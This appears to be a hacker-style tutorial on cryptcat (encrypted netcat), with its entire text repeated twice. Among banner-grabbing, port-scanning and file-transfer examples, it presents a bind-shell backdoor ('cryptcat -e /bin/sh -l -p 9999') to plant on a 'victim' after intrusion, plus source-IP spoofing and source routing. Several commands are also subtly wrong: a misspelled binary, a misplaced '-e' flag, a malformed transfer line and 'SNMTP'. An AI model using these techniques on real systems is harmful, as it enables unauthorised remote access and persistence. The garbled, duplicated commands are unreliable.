Main:
Advanced Usage of the encrypt3d SwiSS army K.nife!
+=+=+=+=+=+=+=+=+=
Cryptcat: Advanced Usage
+=+=+=+=+=+=+=+=+=
++||||||> CRYPTCAT <|||||||||++
It is, basically, netcat with encryption (twofish) turned ON. So instead of having communications sent/received in clear text, you have it encrypted in twofish... So it doesn't get sniffed!
This tool is often referred to as the "TCP/IP Swiss Army Knife", because of its ability to establish various connections across networks.
So, if you've ever used netcat, then it should be easy for you to use cryptcat. The Syntax for using command line is the same.
Let's start by explaining the basic usage of it, by examples, then move on to m0re compleX stuff:
______________________________________________________________
First, to establish a connection between two machines, we'd go about this by:
-= making machine #1 (local/victim) listen on a port (with an IP of 192.168.1.1) =-
>$ crypcat -l -p 3333
-= Making machine #2 (remote/attacker) establish connection (from 192.168.1.2) =-
>$ cryptcat 192.168.1.1 3333
______________________________________________________________
You can also use cryptcat for banner grabbing, ie. for SNMTP servers:
>$ cryptcat 192.168.1.1 25
220 192.168.1.1 ESMTP Sendmail 8.10.2+Sun/8.10.2; Sun
19 Feb 2007 12:25:02 -0500 (EST)
this should connect you to the SNMTP server, and output the server's Name and Version.
______________________________________________________________
Can also use cryptcat as a script to banner grab, say on an HTTP server, as such:
>$ cryptcat hostname 80 < get_reqst.txt
set get_reqst.txt to contain the following script:
HEAD / HTTP/1.0[ENTER]
[ENTER]
(don't actually type in [ENTER], rather, just press it twice) duh!.
OR --- try (from the SHELL):
>$ echo -e "GET 192.168.1.1 HTTP/1.0nn" | cryptcat –w 5 192.168.1.1 80
______________________________________________________________
Say, instead of using a ROOTKIT after intruding on a computer, you can simply use cryptcat to get a SHELL every time you connect to a port you specify for the local machine to listen onto with cryptcat. This is a simple backd00r. To do this, simply type on the local/victim machine:
>$ cryptcat -e /bin/sh -l -p 9999
(that's assuming the user is using UNIX)
Now, as the attacker, all you need to do is either connect from your machine (or locally) to the victim, then that should spawn a shell for j00.
>$ cryptcat 192.168.1.1 9999 -e /bin/sh
______________________________________________________________
You can even make cryptcat act like a PORT SCANNER with:
>$ cryptcat -v -z 192.168.1.1 1-9999
this scans 192.168.1.1 for ports 1 to 9999
______________________________________________________________
Also, you can use it to sp00f your source IP Address:
>$ cryptcat -s 69.13.37.69 192.168.1.1
remember, the sp00fed IP address (69.13.37.69) come before the remote IP address (192.168.1.1). This causes the remote host to respond back to the sp00fed IP address. Don't start thinking of how malicious you can be with this!
______________________________________________________________
Ah, yes, and one of my favourites... Transfering Files. To do this, simply, set a computer (not necessarily a victim) to host a file (take_me.txt):
>$ cryptcat -v -l -p 9999 < take_me.txt
Now, to get take_me.txt, all we do on the client is:
>$ cryptcat -v 192.168.1.1 9999 take_me.txt
Note: 192.168.1.1 is still the server/victim.
______________________________________________________________
And finally, you can use it for source-routing to connect to a port on a remote host:
>$ cryptcat -g 69.13.37.69 192.168.1.1 9999
Note: 69.13.37.69 is gateway we're going through to connect to 192.168.1.1 to port 9999
LINKS
HOMEPAGE: http://farm9.org/Cryptcat/
Download: http://sourceforge.net/projects/cryptcat/
Man Page: http://www.phlak.org/docs/tools/cryptcat.txt
Hope you learned s0mething at least. Expect more! And ...
Always Remember!
1: Netfish is RIGHT.
2: If {you think Netfish is WRONG} then SLAP YOURSELF, and goto the FIRST POINT.
Cryptcat: Advanced Usage
+=+=+=+=+=+=+=+=+=
++||||||> CRYPTCAT <|||||||||++
It is, basically, netcat with encryption (twofish) turned ON. So instead of having communications sent/received in clear text, you have it encrypted in twofish... So it doesn't get sniffed!
This tool is often referred to as the "TCP/IP Swiss Army Knife", because of its ability to establish various connections across networks.
So, if you've ever used netcat, then it should be easy for you to use cryptcat. The Syntax for using command line is the same.
Let's start by explaining the basic usage of it, by examples, then move on to m0re compleX stuff:
______________________________________________________________
First, to establish a connection between two machines, we'd go about this by:
-= making machine #1 (local/victim) listen on a port (with an IP of 192.168.1.1) =-
>$ crypcat -l -p 3333
-= Making machine #2 (remote/attacker) establish connection (from 192.168.1.2) =-
>$ cryptcat 192.168.1.1 3333
______________________________________________________________
You can also use cryptcat for banner grabbing, ie. for SNMTP servers:
>$ cryptcat 192.168.1.1 25
220 192.168.1.1 ESMTP Sendmail 8.10.2+Sun/8.10.2; Sun
19 Feb 2007 12:25:02 -0500 (EST)
this should connect you to the SNMTP server, and output the server's Name and Version.
______________________________________________________________
Can also use cryptcat as a script to banner grab, say on an HTTP server, as such:
>$ cryptcat hostname 80 < get_reqst.txt
set get_reqst.txt to contain the following script:
HEAD / HTTP/1.0[ENTER]
[ENTER]
(don't actually type in [ENTER], rather, just press it twice) duh!.
OR --- try (from the SHELL):
>$ echo -e "GET 192.168.1.1 HTTP/1.0nn" | cryptcat –w 5 192.168.1.1 80
______________________________________________________________
Say, instead of using a ROOTKIT after intruding on a computer, you can simply use cryptcat to get a SHELL every time you connect to a port you specify for the local machine to listen onto with cryptcat. This is a simple backd00r. To do this, simply type on the local/victim machine:
>$ cryptcat -e /bin/sh -l -p 9999
(that's assuming the user is using UNIX)
Now, as the attacker, all you need to do is either connect from your machine (or locally) to the victim, then that should spawn a shell for j00.
>$ cryptcat 192.168.1.1 9999 -e /bin/sh
______________________________________________________________
You can even make cryptcat act like a PORT SCANNER with:
>$ cryptcat -v -z 192.168.1.1 1-9999
this scans 192.168.1.1 for ports 1 to 9999
______________________________________________________________
Also, you can use it to sp00f your source IP Address:
>$ cryptcat -s 69.13.37.69 192.168.1.1
remember, the sp00fed IP address (69.13.37.69) come before the remote IP address (192.168.1.1). This causes the remote host to respond back to the sp00fed IP address. Don't start thinking of how malicious you can be with this!
______________________________________________________________
Ah, yes, and one of my favourites... Transfering Files. To do this, simply, set a computer (not necessarily a victim) to host a file (take_me.txt):
>$ cryptcat -v -l -p 9999 < take_me.txt
Now, to get take_me.txt, all we do on the client is:
>$ cryptcat -v 192.168.1.1 9999 take_me.txt
Note: 192.168.1.1 is still the server/victim.
______________________________________________________________
And finally, you can use it for source-routing to connect to a port on a remote host:
>$ cryptcat -g 69.13.37.69 192.168.1.1 9999
Note: 69.13.37.69 is gateway we're going through to connect to 192.168.1.1 to port 9999
LINKS
HOMEPAGE: http://farm9.org/Cryptcat/
Download: http://sourceforge.net/projects/cryptcat/
Man Page: http://www.phlak.org/docs/tools/cryptcat.txt
Hope you learned s0mething at least. Expect more! And ...
Always Remember!
1: Netfish is RIGHT.
2: If {you think Netfish is WRONG} then SLAP YOURSELF, and goto the FIRST POINT.
Posted by 
